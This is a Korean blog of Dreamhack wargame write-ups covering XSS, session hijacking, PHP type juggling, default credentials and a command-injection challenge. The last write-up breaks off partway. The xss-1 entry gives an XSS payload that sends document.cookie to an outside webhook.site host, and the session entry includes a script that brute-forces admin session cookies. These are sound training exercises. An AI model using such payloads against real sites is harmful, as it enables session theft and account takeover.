xmi1e-vir.log

[Dreamhack] wargame 'xss-1' write-up

eunee22 — Thu, 2 Oct 2025 14:16:08 +0900

1️⃣ Level 1
문제링크
여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다.
XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다.
플래그 형식은 DH{...} 입니다.

문제 파악

웹사이트에 접속하면 vuln(xss) page, memo, flag 페이지 이렇게 3개로 연결되는 하이퍼링크가 나온다.

<p class="important"><a href="/vuln?param=<script>alert(1)</script>">vuln(xss) page</a></p>
<p class="important"><a href="/memo?memo=hello">memo</a></p>
<p class="important"><a href="/flag">flag</a></p>

/flag 페이지에 접속하면 param값을 입력할 수 있는 폼이 나온다.

/flag

  @app.route("/flag", methods=["GET", "POST"])
  def flag():
      if request.method == "GET":
          return render_template("flag.html")
      elif request.method == "POST":
          param = request.form.get("param")
          if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
              return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'

param부분에 값을 입력하여 POST요청을 보내게 되면 check_xss(param) 함수가 실행된다.

flag.html

<form method="POST">
  http://127.0.0.1:8000/vuln?param=<input type="text" name="param"/><br/>
  <input type="submit"/><br/>

check_xss()에서는 사용자가 입력한 param을 포함한 url이 제대로 작동하는지 검증한다.
여기에서 좀 헷갈릴수도 있는데, XSS가 제대로 성공했는지를 확인하는게 아니라 단순히 브라우저가 에러없이 페이즈를 로딩했는가를 확인한다.

def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    return read_url(url, cookie)

문제 풀이

문제를 풀기 전에 이 문제의 제목인 "XSS"가 무엇인지 알아야한다.

XSS(Cross Site Scripting) 이란?

웹사이트의 입력 가능한 공간에 자바스크립트와 같은 스크립트 코드를 삽입하여 개발자가 고려하지 않은 기능이 작동하게 하는것
XSS 공격의 유형은 여러개가 존재한다.

1. Reflected XSS

공격 스크립트가 URL 파라미터에 담겨 서버 응답에 그대로 반사되어 브라우저에서 실행
공격 방식:
- 공격자가 스크립트를 포함한 URL을 제작
- 사용자가 해당 URL을 클릭하면, 서버가 파라미터 값을 응답 페이지에 그대로 삽입
- 브라우저가 응답을 렌더링하면서 악성 스크립트 실행
주요 포인트:
- URL(쿼리스트링)에 악성 코드가 포함됨
- 요청 페이지 = 응답 페이지 구조
- 주로 GET 방식 요청에서 발생

2. Stored XSS

공격 스크립트가 웹 서버(DB) 에 저장되고, 이후 페이지를 방문하는 사용자에게 자동 실행
공격 방식:
- 공격자가 게시판/댓글 등 입력란에 악성 스크립트를 삽입
- 서버가 이 데이터를 DB에 저장
- 다른 사용자가 해당 게시글을 열람하면, 저장된 스크립트가 페이지에 포함되어 실행
주요 포인트:
- 데이터 저장 후 반복적으로 노출되기 때문에 피해 범위가 넓음
- 요청 페이지 ≠ 응답 페이지 여도 공격 가능
- 사용자가 단순히 페이지 조회만 해도 감염

3. DOM Based XSS

서버를 거치지 않고, 클라이언트(브라우저) 측 JavaScript가 입력값을 DOM 조작 과정에서 그대로 실행
공격 방식:
- 공격자가 page.php?value=<script> 같은 URL을 전달
- 서버 응답에는 그대로 포함되지 않음
- 클라이언트 측 JS 코드(document.write, location.hash 등)가 이 값을 DOM에 삽입하면서 실행
구분 방법:
- 웹 프록시로 서버 응답(Response)을 확인했을 때 입력값이 없다면 DOM XSS 가능성
- 즉, 응답에는 없지만 브라우저 렌더링 중 실행되는 케이스
주요 포인트:
- 동적 페이지의 클라이언트 렌더링 로직을 노림
- 서버 응답에는 공격 코드가 없음

풀이

풀이를 시작하기 전에 나는 문제에서 의도한 "memo"페이지를 제대로 활용하지 못하고, 다른 방법을 사용하여 풀이가 좀 더 복잡해졌다는 것을 미리 언급한다.

해당 문제의 코드를 살펴보면 Reflected XSS, 즉 서버 측 취약점에 해당한다.

@app.route("/vuln")
def vuln():
    param = request.args.get("param", "")
    return param

이 함수는 Flask 서버가 쿼리스트링 param 값을 그대로 응답으로 반환하기 때문이다.
서버가 <script>와 같은 태그 요소를 필터링하지 않고 그대로 출력하기 때문에, 브라우저는 이를 HTML로 해석해 스크립트를 실행하게 된다.

즉, 사용자가 전달한 입력값이 그대로 응답에 담겨 클라이언트에서 실행되는 구조이므로 Reflected XSS 취약점이 발생한다.

따라서 쿠키로 저장되는 flag를 탈취해 응답에 포함되도록 하고, 해당 응답을 읽을 수 있는 곳으로 보내면 얻을 수 있다.
원래는 이 웹사이트에서 제공해준 /memo로 응답을 보내면 되지만

@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\n"
    return render_template("memo.html", memo=memo_text)

나는 이걸 모르고(왜 그랬지) webhook.site라는 곳에서 임시로 응답을 받을 수 있는 서버를 배정받았다.

param 값에 다음과 같은 페이로드를 삽입하면, 사용자의 쿠키 값을 내가 지정한 서버로 전송할 수 있다.

<img src=x onerror="new Image().src='https://webhook.site/{ID}?c='+encodeURIComponent(document.cookie)">

위 코드를 입력하면 브라우저는 onerror 이벤트를 통해 document.cookie 값을 추출하고, 이를 https://webhook.site/{ID}로 전달한다.
결과적으로 아래와 같이 공격자가 설정한 서버로 flag(쿠키 값) 이 전송된 것을 확인할 수 있다.

[참고할 자료]

문제에서 의도한대로 /memo로 값을 보낸 풀이
https://whitehacking.tistory.com/27
/memo 엔드포인트에서 param 값을 memo.html에 랜더링하여 사용자에게 보여주므로 location.href의 url주소로 넘겨주는 방식

* 참고문헌

XSS개념

[Dreamhack] wargame 'session-basic' write-up

eunee22 — Mon, 29 Sep 2025 17:04:07 +0900

1️⃣ Level 1
문제링크
쿠키와 세션으로 인증 상태를 관리하는 간단한 로그인 서비스입니다.
admin 계정으로 로그인에 성공하면 플래그를 획득할 수 있습니다.
플래그 형식은 DH{...} 입니다.

문제 파악

새싹의 session과 유사한 문제이다.

사용자 계정 정보

주어진 사용자 계정 정보이다.

users = {
    'guest': 'guest',
    'user': 'user1234',
    'admin': FLAG
}

메인페이지 (index)

admin으로 로그인을 성공하면 flag가 출력된다.

@app.route('/')
def index():
    session_id = request.cookies.get('sessionid', None)
    try:
        # get username from session_storage
        username = session_storage[session_id]
    except KeyError:
        return render_template('index.html')

    return render_template('index.html', text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not admin"}')

로그인 방식

username에 맞는 password를 가져와서 사용자가 입력한 pw와 비교한다.
일치한다면 session_id값을 랜덤으로 부여한뒤 session_storage 리스트의 해당 위치에 username을 저장하는 것이 알고리즘이다.

app.route('/login', methods=['GET', 'POST'])
def login():
   if request.method == 'GET':
       return render_template('login.html')
   elif request.method == 'POST':
       username = request.form.get('username')
       password = request.form.get('password')
       try:
           # you cannot know admin's pw
           pw = users[username]
       except:
           return '<script>alert("not found user");history.go(-1);</script>'
       if pw == password:
           resp = make_response(redirect(url_for('index')) )
           session_id = os.urandom(32).hex()
           session_storage[session_id] = username
           resp.set_cookie('sessionid', session_id)
           return resp
       return '<script>alert("wrong password");history.go(-1);</script>'

웹페이지 시작과 함께 admin도 session_storage의 랜덤 위치즉, 랜덤의 session_id에 저장된다.

문제 풀이

admin의 이름이 session_storage의 어디에 저장되어있는지를 타나내는 session_id를 찾으면 되는 문제이다.
session문제와 다르게 이번에는 32자리의 랜덤값이기 때문에 브루트포스를 통해 푸는게 불가능하다.

아래 코드를 자세히 보면 /admin 페이지로 이동하면 session_storage 값을 리턴하는 것을 볼수 있다

다만 주석 처리 된 부분은 이 방법을 막기 위한 코드로 보인다
username이 admin인지 검증하는 부분이 있기 때문이다.
→ admin이 아니면 index.html로 돌아가도록

@app.route('/admin')
def admin():
    # developer's note: review below commented code and uncomment it (TODO)

    #session_id = request.cookies.get('sessionid', None)
    #username = session_storage[session_id]
    #if username != 'admin':
    #    return render_template('index.html')

    return session_storage

따라서 로그인 후 url뒤에 /admin을 붙여주면 다음과 같이 저장된 session_storage의 리스트 값들이 나온다.
이걸로 쿠키값을 바꾸어주면 admin으로 로그인했다고 인식한다.

[Dreamhack] wargame 'php7cmp4re' write-up

eunee22 — Tue, 23 Sep 2025 18:46:56 +0900

Biginner
문제링크
php 7.4로 작성된 페이지입니다.
알맞은 Input 값을 입력하고 플래그를 획득하세요.
플래그 형식은 DH{} 입니다.

문제 파악

index.php

input1과 input2를 입력하여 submit하면 check.php로 제출된다.

<div class="container">
      <div class="box">
      <h4>Enter the correct Input.</h4>
        <p>
          <form method="post" action="/check.php">
              <input type="text" placeholder="input1" name="input1">
              <input type="text" placeholder="input2" name="input2">
              <input type="submit" value="제출">
          </form>
        </p>
      </div>

flag가 존재하는 flag.php로 직접 이동하는 것은 방지되어있다.

<?php
    require_once('flag.php');
    error_reporting(0);
?>

check.php

이 코드가 핵심인데, 우리는 input1과 input2에 해당 코드에서 정의 해놓은 규칙에 부합하는 값을 입력해야한다.
정리해보면 다음과 같다.
1. 두 입력값 모두 빈칸이 아닐것
2. input1의 길이가 4보다 작을것
3. input1의 값이 "8", "7.A"보다 작고, "7.9"보다는 클것
4. input2의 길이가 1과 3사이
5. input2가 74보다 작고 "74"보다 큼

<div class="container">
<?php
require_once('flag.php');
error_reporting(0);
// POST request
if ($_SERVER["REQUEST_METHOD"] == "POST") {
  $input_1 = $_POST["input1"] ? $_POST["input1"] : "";
  $input_2 = $_POST["input2"] ? $_POST["input2"] : "";
  sleep(1);

  if($input_1 != "" && $input_2 != ""){
    if(strlen($input_1) < 4){
      if($input_1 < "8" && $input_1 < "7.A" && $input_1 > "7.9"){
        if(strlen($input_2) < 3 && strlen($input_2) > 1){
          if($input_2 < 74 && $input_2 > "74"){
            echo "</br></br></br><pre>FLAG\n";
            echo $flag;
            echo "</pre>";
          } else echo "<br><br><br><h4>Good try.</h4>";
        } else echo "<br><br><br><h4>Good try.</h4><br>";
      } else echo "<br><br><br><h4>Try again.</h4><br>";
    } else echo "<br><br><br><h4>Try again.</h4><br>";
  } else{
    echo '<br><br><br><h4>Fill the input box.</h4>';
  }
} else echo "<br><br><br><h3>WHat??!</h3>";
?> 
</div>

문제 풀이

이 문제에서 주어진 웹사이트의 동작과 조건을 이해하는 것은 어렵지 않았지만, php 관련 지식이 없다보니까 푸는 데에는 굉장히 어려움을 겪었다.

php 숫자형 문자열 (numeric string)

일단 해당 문제의 제목이 php 7.4인 만큼 해당 버전에서만 나타나는 동작, 취약점이 존재할 것이라고 생각했다.

문제를 풀기 위해서는 숫자형 문자열에 대해서 알아야한다.
php에서는 문자열이 숫자처럼 해석될 수 있는 경우, 자동으로 숫자형으로 형 변환(type juggling) 이 일어나는 경우가 있다. 이때 해당 문자열을 numeric string (숫자형 문자열) 이라고 부른다. 이러한 문자열은 정수 또는 부동소수점 형식으로 파싱될 수 있는 문자열이다.

아래는 예시이다.

var_dump("123" + 1);         // int(124)
var_dump("10.5" * 2);        // float(21)
var_dump("123abc" + 1);      // int(124) – 앞쪽 숫자만 사용됨
var_dump("abc123" + 1);      // int(1) – 숫자로 변환 실패시 0 처리

단, 몇가지 주의점이 존재한다.
"123abc"처럼 앞쪽에 숫자가 있고 뒤에 문자가 있으면, 앞부분만 숫자로 파싱된다.
반대로 "abc123"처럼 앞에 문자가 있으면, 전체가 숫자로 변환되지 않아 0으로 간주된다.

이는 == 비교 시에도 영향을 주고, 이는 타입 변환 취약점(Type Juggling Vulnerability)이라는 실제 취약점으로 존재한다.
간단히 말해서 php에서 ==와 같은 느슨한 비교(loose comparison)를 사용할때 두 값의 타입이 다르면 자동으로 type juggling이 시도되기 때문에 이 과정에서 의도치 않은 동등 비교 결과가 발생할 수 있어 보안상 취약점이 된다.
이 문제에서는 해당 취약점이 핵심이 아니기 때문에 참고할만한 블로그를 첨부한다.

hy30nq - php 취약점과 예방법
gkdisakdmaqk - php 비교 연산자 취약점(md5 매직해시)
hyunmini - php 의 연산자 취약점

php 7.4에서 숫자형 문자열의 기준

php 7.4에서 숫자형 문자열은 is_numeric_string_ex() 함수의 처리 방식에 따라서 판단된다. 해당 함수에서는 정규표현식으로 숫자형 문자열을 판단하는데, 조건 중 하나를 만족하면 숫자형 문자열로 간주어되어 느슨한 비교시 숫자 변환이 이루어진다.

정규표현식의 조건은 아래와 같다.

1. 정수(integer) 형태

^[+-]?[0-9]+$

앞뒤에 공백은 허용 (trim 후 판정)
EX) "0", "123", "-42", "+7"

2. 부동소수(float) 형태

^[+-]?(?:[0-9]*\.[0-9]+|[0-9]+\.[0-9]*)$

소수점 앞이나 뒤는 비어 있어도 됨 (하나는 숫자여야 함)
EX) "3.14", "0.5", ".5", "5."

3. 지수 표기법(exponent) 형태

^[+-]?(?:[0-9]+(?:\.[0-9]*)?|\.[0-9]+)[eE][+-]?[0-9]+$

EX) "1e10", "3.5E+7", "2.0e-3"

4. 양끝 공백 허용

" 123 " → OK (공백 제거 후 판정)
" 3.14 " → OK

5. 허용 안되는 경우
아래와 같이 규칙을 벗어나면 숫자형 문자열이 아님

숫자 뒤에 알파벳/특수문자 ("123abc", "1.2.3", "7.A")
숫자 시작이 아니면서 숫자 부분이 없는 경우 ("abc", "-")
지수부 형식이 불완전 ("1e", "2e+")

헷갈렸던 부분

내가 이 문제를 풀며 가장 헷갈렸던 부분은 총 두가지이다.
1. "숫자형 문자열"과 "숫자"는 엄연히 다르다.

"8"과 같은 것들이 다 숫자로 무조건 변환된다고 생각했으나, 기본적으로는 문자열이라는 사실을 잊으면 안된다.

2. 둘 중 하나라도 "숫자형 문자열"의 기준에 부합하지 않으면 "문자열"끼리는 아스키 비교

하나라도 숫자형 문자열이면 둘다 숫자로 변환한다고 생각했다.

input1

input1에 해당하는 조건은
1. 빈칸이 아닐것
2. `input <”8”`
→ `“8”`: 숫자형 문자열
3. `“7.9” < input < “7.A”`
→ `“7.A”`: 문자열
→ `“7.9”`: 숫자형 문자열

비교하는 연산자 중에 하나라도 숫자형 문자열이 아니라면 문자열로 간주하여 비교한다.
숫자로는 위 조건에 부합할 수 있는 것이 없으므로 전부다 아스키코드로 즉, 문자열로써 비교하게 만들어야 한다.

따라서 아스키코드 상으로 8과 7.A보다 작으며, 7.9보다 큰 경우를 찾으면 된다.
나는 **`7.;`** 을 입력값으로 지정했다.

input2

input2에 해당하는 조건은
1. 빈칸이 아닐것
2. 길이가 1과 3사이
→ 2자리
3. `input_2 < 74`
→ 74는 숫자
4. `input_2 > "74"`
→ "74"는 숫자형 문자열

74 자체는 숫자이므로 3번 조건에서는 숫자로 비교할 수 밖에없다.
그러나, 4번 조건도 숫자로 비교하면 통과하는 것이 불가능하다.
따라서 74와는 숫자로 비교하고, "74"와는 문자열로 비교해야한다.

이 문제를 풀때는 드림핵의 아래 게시물의 도움을 조금 받았다.

`7a` 와 같은 값을 입력하면,
1. 74와 비교할때는 7이 되고
2. "74"와 비교할때는 2번째 자리의 아스키코드가 더 크므로
조건에 부합한다.

이 두값을 입력하면 무리없이 flag를 얻을 수 있다.

[Dreamhack] wargame 'web-misconf-1' write-up

eunee22 — Fri, 19 Sep 2025 19:43:17 +0900

Biginner
문제링크
기본 설정을 사용한 서비스입니다.
로그인한 후 Organization에 플래그를 설정해 놓았습니다.

문제 파악

제공되는 코드는 Dockerfile, deploy/defaults.ini 외에는 없다.

VM을 생성하면 다음과 같은 웹사이트에 접속할 수 있다.

비밀번호와 아이디를 모르면 아무것도 할 수 없다.

문제 풀이

Dockerfile을 열어보니 의미있는 내용은 없었다.
반면, defaults.ini을 열어보니 계정 정보를 얻을 수 있었다.

해당 정보로 로그인 해서 문제의 지시대로 'Server Admin → Settings → auth.anonymous → org_name' 로 이동하면 flag 정보를 얻을 수 있다.

정말 어이없겠지만, ~~사실 나는 그냥 찍어서 admin/admin으로 로그인 해봤는데 성공했다.~~
플래그를 보면 기본 계정이 얼마나 위험한지 경각심을 심어주기 위한 문제인것 같다.

[Dreamhack] wargame 'session' write-up

eunee22 — Mon, 15 Sep 2025 17:02:55 +0900

Biginner
문제링크
쿠키와 세션으로 인증 상태를 관리하는 간단한 로그인 서비스입니다.
admin 계정으로 로그인에 성공하면 플래그를 획득할 수 있습니다.

문제 파악

주어진 페이지는 username가 admin인 경우에 flag를 제공해준다.

@app.route('/')
def index():
    session_id = request.cookies.get('sessionid', None)
    try:
        username = session_storage[session_id]
    except KeyError:
        return render_template('index.html')

    return render_template('index.html', text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not admin"}')

유효한 유저목록은 아래와 같다.

users = {
    'guest': 'guest',
    'user': 'user1234',
    'admin': FLAG
}
// 임시 세션 저장소
session_storage = {
}

로그인 과정을 살펴보면
유저이름에 알맞는 비밀번호가 입력되면 os.urandom(4).hex()을 통해 랜덤 session_id를 생성하고 sesson_storage의 해당 인덱스에 username을 저장한다.

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    elif request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        try:
            pw = users[username]
        except:
            return '<script>alert("not found user");history.go(-1);</script>'
        if pw == password:
            resp = make_response(redirect(url_for('index')) )
            session_id = os.urandom(4).hex()
            session_storage[session_id] = username
            resp.set_cookie('sessionid', session_id)
            return resp 
        return '<script>alert("wrong password");history.go(-1);</script>'

문제 풀이

앞서 보았듯이 로그인에서 가장 핵심적인 정보가 session_id이다.
만약 우리가 guest로 로그인을 한 상태라면, session_storage에서 guest라는 username이 저장되어있는 위치가 바로 session_id인것이다.

따라서 우리가 로그인하고자 하는 admin의 세션 아이디를 알 수 있다면, 우리는 admin으로 로그인을 한것처럼 웹사이트를 속일 수 있다.

그렇다면 admin의 세션 아이디는 어디있을까?
바로 main()함수에서 찾아볼 수 있다.

if __name__ == '__main__':
    import os
    session_storage[os.urandom(1).hex()] = 'admin'
    print(session_storage)
    app.run(host='0.0.0.0', port=8000)

main()이 실행됨과 동시에 os.urandom(1).hex()라는 코드로 랜덤값을 생성하고, 이게 admin의 session_id가 된다.

os.urandom(1)은 딱 1바이트 (8비트) 를 생성하므로, 값의 범위는 0~255이고 총 256가지의 경우의 수가 있는것이다.
이정도면 브루트 포스(brute force)로 충분히 해결이 가능한 수준이기 때문에 gpt한테 시켜서 응답이 성공할때의 세션 아이디를 가져오는 코드를 작성했다.

import requests

# 문제의 웹사이트 주소
TARGET_URL = 'http://host8.dreamhack.games:port/' 
SUCCESS_STRING = 'admin'

def find_admin_session():
    """
    0x00부터 0xff까지 모든 세션 ID 값을 시도하여 admin 계정을 탐색
    """
    print("... Admin 세션 ID 찾기 시작 ...")

    # 0부터 255까지의 모든 경우의 수를 확인
    for i in range(256):
        # 숫자를 두 자리 16진수 문자열로 변환
        session_id_to_try = f'{i:02x}'
        cookies = {
            'sessionid': session_id_to_try 
        }

        try:
            # 조작된 세션 쿠키를 포함하여 GET 요청
            response = requests.get(TARGET_URL, cookies=cookies)
            
            # 응답 내용(response.text)에 성공 문자열이 포함되어 있는지 확인
            if SUCCESS_STRING in response.text:
                print(f"\n[+] 성공! Admin 세션 ID를 찾았습니다: {session_id_to_try}")
                return session_id_to_try

            print(f"\r시도 중: {session_id_to_try}", end="")

        except requests.exceptions.RequestException as e:
            print(f"\n[!] 요청 중 오류가 발생했습니다: {e}")
            return None

    print("\n[-] 실패. Admin 세션 ID를 찾지 못했습니다.")
    return None

if __name__ == '__main__':
    find_admin_session()

guest, user와 같이 미리 주어진 계정으로 로그인 해놓은 뒤 session_id를 알아낸 값으로 바꾸면 아래와 같이 flag를 얻을 수 있다.

[참고할 자료]

문제를 풀고 나서 찾아본 다른 분들의 풀이중에 참고하면 좋을 풀이를 공유한다.

brup suite의 intrude 기능으로 브루트포스
https://alim11.tistory.com/408

[Dreamhack] wargame ' simple-web-request' write-up

eunee22 — Fri, 12 Sep 2025 22:31:22 +0900

Biginner
문제링크
STEP 1~2를 거쳐 FLAG 페이지에 도달하면 플래그가 출력됩니다.
모든 단계를 통과하여 플래그를 획득하세요. 플래그는 flag.txt 파일과 FLAG 변수에 있습니다.
플래그 형식은 DH{...} 입니다.

문제 파악

주어진 웹사이트로 접속하면 아래와 같이 param, param2를 입력하는 창이 나온다.

문제 풀이

코드를 살펴보면서 어떻게 풀어야할지 고민해보자

Step1

웹사이트 URL의 파라미터로 뭐가 들어갈지 입력하는 과정
- param: getget / param2: rerequest 넣어야 step2로 넘어갈 수 있음

@app.route("/step1", methods=["GET", "POST"])
def step1():
    if request.method == "GET":
        prm1 = request.args.get("param", "")
        prm2 = request.args.get("param2", "")
        step1_text = "param : " + prm1 + "\nparam2 : " + prm2 + "\n"
        if prm1 == "getget" and prm2 == "rerequest":
            return redirect(url_for("step2", prev_step_num = step1_num))
        return render_template("step1.html", text = step1_text)
    else: 
        return render_template("step1.html", text = "Not POST")

값을 맞게 입력하면 step2로 넘어갈 수 있다.

Step2

html 파일을 확인해보니, 입력값을 제출하면 flag페이지로 연결

{% block content %}
{% if prev_step_num and hidden_num %}
<form action="/flag" method="post">
    <p>param <input type="text" name="param"/></p>
    <p>param2 <input type="text" name="param2"/></p>
    <input type="hidden" name="check" value="{{ hidden_num }}"/>
    <input type="submit"/>
</form>
{% else %}
...
{% endif %}

flag 페이지의 코드
- param: pooost / param2: requeeest 를 입력해야 통과할 수 있다는 것을 알수있다.

@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html", flag_txt="Not yet")
    else:
                prm1 = request.form.get("param", "")
                prm2 = request.form.get("param2", "")
                if prm1 == "pooost" and prm2 == "requeeest":
                    return render_template("flag.html", flag_txt=FLAG)
                else:
                    return redirect(url_for("step2", prev_step_num = str(step1_num)))
            return render_template("flag.html", flag_txt="Not yet")
        except:
            return render_template("flag.html", flag_txt="Not yet")

파악한 값을 입력하면 무난하게 flag를 얻을 수 있다.

[Dreamhack] wargame 'Flying Chars' write-up

eunee22 — Thu, 11 Sep 2025 09:53:07 +0900

Biginner
문제링크
날아다니는 글자들을 멈춰서 전체 문자열을 알아내세요! 플래그 형식은 DH{전체 문자열} 입니다.
❗첨부파일을 제공하지 않는 문제입니다.
❗플래그에 포함된 알파벳 중 x, s, o는 모두 소문자입니다.
❗플래그에 포함된 알파벳 중 C는 모두 대문자입니다.

문제 파악

따로 주어진 코드는 없으며 웹페이지를 열어보면 빠르게 글자들이 이동하고 있는 장면을 볼 수 있다.

개발자 모드를 열어서 코드를 확인해보면 다음 부분이 글자를 이동시키는 부부분에 해당한다.

<script type="text/javascript">
    const img_files = ["/static/images/10.png", "/static/images/17.png", "/static/images/13.png", "/static/images/7.png","/static/images/16.png", "/static/images/8.png", "/static/images/14.png", "/static/images/2.png", "/static/images/9.png", "/static/images/5.png", "/static/images/11.png", "/static/images/6.png", "/static/images/12.png", "/static/images/3.png", "/static/images/0.png", "/static/images/19.png", "/static/images/4.png", "/static/images/15.png", "/static/images/18.png", "/static/images/1.png"];
    var imgs = [];
    for (var i = 0; i < img_files.length; i++){
      imgs[i] = document.createElement('img');
      imgs[i].src = img_files[i]; 
      imgs[i].style.display = 'block';
      imgs[i].style.width = '10px';
      imgs[i].style.height = '10px';
      document.getElementById('box').appendChild(imgs[i]);
    }

    const max_pos = self.innerWidth;
    function anim(elem, pos, dis){
      function move() {
        pos += dis;
        if (pos > max_pos) {
          pos = 0;
        }
        elem.style.transform = `translateX(${pos}px)`;
        requestAnimationFrame(move);
      }
      move();
    }

    for(var i = 0; i < 20; i++){
      anim(imgs[i], 0, Math.random()*60+20);
    }
  </script>

코드는 다음과 같이 작동된다.

이미지 생성 및 설정
- img_files라는 배열에 20개 이미지 파일의 경로를 저장
- for 반복문을 통해 20개의 <img> 태그를 동적으로 생성
- 생성된 각 이미지에 너비와 높이를 10픽셀로 지정하고, 'box'라는 ID를 가진 HTML 요소 안에 추가
애니메이션 함수 anim()
- HTML 요소와 시작 위치, 이동 거리를 입력받아 애니메이션을 처리하는 함수
- 내부의 move 함수는 requestAnimationFrame을 사용하여 부드러운 애니메이션을 구현
- 이미지의 x좌표를 계속해서 증가시켜 오른쪽으로 움직이게함
- 이미지가 화면 오른쪽 끝을 넘어가면 위치를 다시 0으로 리셋하여 왼쪽에서 다시 나타나도록함
애니메이션 실행
- 마지막 for 반복문에서 20개의 각 이미지에 대해 anim 함수를 실행
- Math.random()을 사용하여 각 이미지가 20에서 80 사이의 무작위 속도를 갖게 하여, 이미지들이 서로 다른 속도로 움직이는 효과 구현

문제 풀이

총 두가지의 풀이 방법을 떠올렸다.

1. 배열에서 불러오는 순서대로 읽기

그러나 이건 (개인적으로) 재미가 없는 풀이라고 느껴서 이렇게 풀지는 않았다.

2. 화면 캡쳐

이 역시도 문제에서 의도하는 풀이는 아니라고 생각하여 다른 방법으로 풀었다.

3. 애니메이션 함수 자체를 무력화

애니메이션 구현의 핵심은 requestAnimationFrame() 함수이므로 이 함수를 아무것도 하지 않는 빈함수로 덮어쓴다면 해당 페이지의 모든 애니메이션이 멈추게 된다.
따라서 콘솔에 아래 코드를 입력했다

window.requestAnimationFrame = function() {};

이 코드가 실행된 이후부터 브라우저는 다음 프레임을 그려달라는 모든 요청을 무시하게 되므로, 이미지들의 움직임이 그 자리에 즉시 얼어붙게 된다.
멈춘 화면에서 글자를 하나하나 가져오면 정답은
Too_H4rd_to_sEe_th3_Ch4rs_x.x이다.

[참고할 자료]

문제를 풀고 나서 찾아본 다른 분들의 풀이중에 참고하면 좋을 풀이를 공유한다.

랜덤 속도만 0으로 바꾸는 방법
https://whkakrkr.tistory.com/542

[Dreamhack] wargame 'phpreg' write-up

eunee22 — Mon, 8 Sep 2025 22:37:45 +0900

Biginner
문제링크
php로 작성된 페이지입니다.
알맞은 Nickname과 Password를 입력하면 Step 2로 넘어갈 수 있습니다.
Step 2에서 system() 함수를 이용하여 플래그를 획득하세요.
플래그는 ../dream/flag.txt 에 위치합니다.
플래그의 형식은 DH{...} 입니다.

문제 파악

닉네임이랑 패스워드를 입력해서 제출하면 step2로 넘어간다/

<nav class="navbar navbar-default navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <a class="navbar-brand" href="/">PHPreg</a>
        </div>
        <div id="navbar">
          <ul class="nav navbar-nav">
            <li><a href="/">Step 1</a></li>
            <li><a href="/step2.php">Step 2</a></li>
          </ul>
        </div><!--/.nav-collapse -->
      </div>
    </nav><br/><br/><br/>
    <div class="container">
      <div class="box">
        <h4>Step 1 : Open the door & Go to Step 2 !!</h4>
        <div class="door"><div class="door_cir"></div></div>
        <p>
          <form method="post" action="/step2.php">
              <input type="text" placeholder="Nickname" name="input1">
              <input type="text" placeholder="Password" name="input2">
              <input type="submit" value="제출">
          </form>
        </p>
      </div>
    </div>

step1에서 step2로 넘어가는 부분
- 구체적으로는 if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13")를 참으로 만들어야 한다.

if ($_SERVER["REQUEST_METHOD"] == "POST") {
            $input_name = $_POST["input1"] ? $_POST["input1"] : "";
            $input_pw = $_POST["input2"] ? $_POST["input2"] : "";

            // pw filtering
            if (preg_match("/[a-zA-Z]/", $input_pw)) {
              echo "alphabet in the pw :(";
            }
            else{
              $name = preg_replace("/nyang/i", "", $input_name);
              $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $input_pw);
              # 이게 step2로 넘어가기 위한 조건
              if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") {
                echo '<h4>Step 2 : Almost done...</h4><div class="door_box"><div class="door_black"></div><div class="door"><div class="door_cir"></div></div></div>';

                $cmd = $_POST["cmd"] ? $_POST["cmd"] : "";

                if ($cmd === "") {
                  echo '
                        <p><form method="post" action="/step2.php">
                            <input type="hidden" name="input1" value="'.$input_name.'">
                            <input type="hidden" name="input2" value="'.$input_pw.'">
                            <input type="text" placeholder="Command" name="cmd">
                            <input type="submit" value="제출"><br/><br/>
                        </form></p>
                  ';
                }
                // cmd filtering
                else if (preg_match("/flag/i", $cmd)) {
                  echo "<pre>Error!</pre>";
                }
                else{
                  echo "<pre>--Output--\n";
                  # 이 함수를 이용
                  system($cmd);
                  echo "</pre>";
                }
              }
              else{
                echo "Wrong nickname or pw";
              }
            }
          }
          // GET request
          else{
            echo "Not GET request";
          }
      ?>

문제 풀이

STEP 1

주어진 식 if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13")는 다음 조건을 만족해야한다.

닉네임
- "nyang"이라는 문자열(대소문자 구분 없이)을 찾아 제거
- 따라서 "dnnyangyang0310"이라는 문자열을 입력하면 "nyang"부분이 지워지면서 dn[~~nyang~~]yang0310 이렇게 우리가 원하는 닉네임이 된다.
비밀번호
- 비밀번호에 영문 알파벳이 미포함
- pw 패턴 /\d*\@\d{2,3}(31)+[^0-8\"]\!/을 d4y0r50ng로 치환
  - \d*: 0개 이상의 숫자
  - @: '@' 기호
  - \d{2,3}: 2개 또는 3개의 숫자
  - (31)+: '31'이 한 번 이상 반복
  - [^0-8"]: 0부터 8까지의 숫자와 큰따옴표(")를 제외한 모든 문자
  - !: '!' 기호
- 조건에 맞는 임의의 비밀번호를 작성하면 된다.
  나는 "1@123319!+1+13"을 작성하였다.

STEP 2

../dream/flag.txt 로 이동하되, "flag"라는 글자는 없이 이동해야 하는것이 조건이다.

$cmd = $_POST["cmd"] ? $_POST["cmd"] : "";

if ($cmd === "") {
  echo '
        <p><form method="post" action="/step2.php">
            <input type="hidden" name="input1" value="'.$input_name.'">
            <input type="hidden" name="input2" value="'.$input_pw.'">
            <input type="text" placeholder="Command" name="cmd">
            <input type="submit" value="제출"><br/><br/>
        </form></p>
  ';
}
// cmd filtering
else if (preg_match("/flag/i", $cmd)) {
  echo "<pre>Error!</pre>";
}
else{
  echo "<pre>--Output--\n";
  # 이 함수를 이용하라고
  system($cmd);
